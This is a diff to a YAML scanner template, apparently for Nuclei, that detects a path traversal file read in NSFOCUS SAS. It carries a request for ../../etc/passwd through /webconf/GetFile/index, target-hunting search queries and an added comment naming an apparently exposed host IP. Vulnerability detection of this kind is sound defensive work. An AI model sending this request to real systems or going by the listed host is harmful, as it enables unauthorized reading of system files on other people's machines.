--- a/domestic/nsfocus/nsfocus-sas-getfile-fileread.yaml
+++ b/domestic/nsfocus/nsfocus-sas-getfile-fileread.yaml
@@ -1,7 +1,7 @@
-id: Nsfocus-SAS_read_webconf
+id: nsfocus-sas-getfile-fileread
 
 info:
-  name: Nsfocus-SAS_read_webconf
+  name: nsfocus-sas-getfile-fileread
   author: hufei
   severity: critical
   description: |
@@ -13,7 +13,7 @@ info:
     fofa-query: title=="NSFOCUS&nbsp;SAS[H]"
     hunter-query: app.name="NSFOCUS 绿盟 SAS"
     verified: true
-  tags: 2023,HVV,Nsfocus-SAS,login-bypass
+  tags: 2023,HVV,nsfocus-sas,login-bypass
 
 
 requests:
@@ -22,7 +22,8 @@ requests:
       - "{{BaseURL}}/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd"
 
     matchers:
-      - type: word
-        part: body
-        words:
-          - 'root'
+      - type: dsl
+        dsl:
+          - "status_code == 200 && contains((body), 'root')"
+
+# https://182.86.70.53:4433
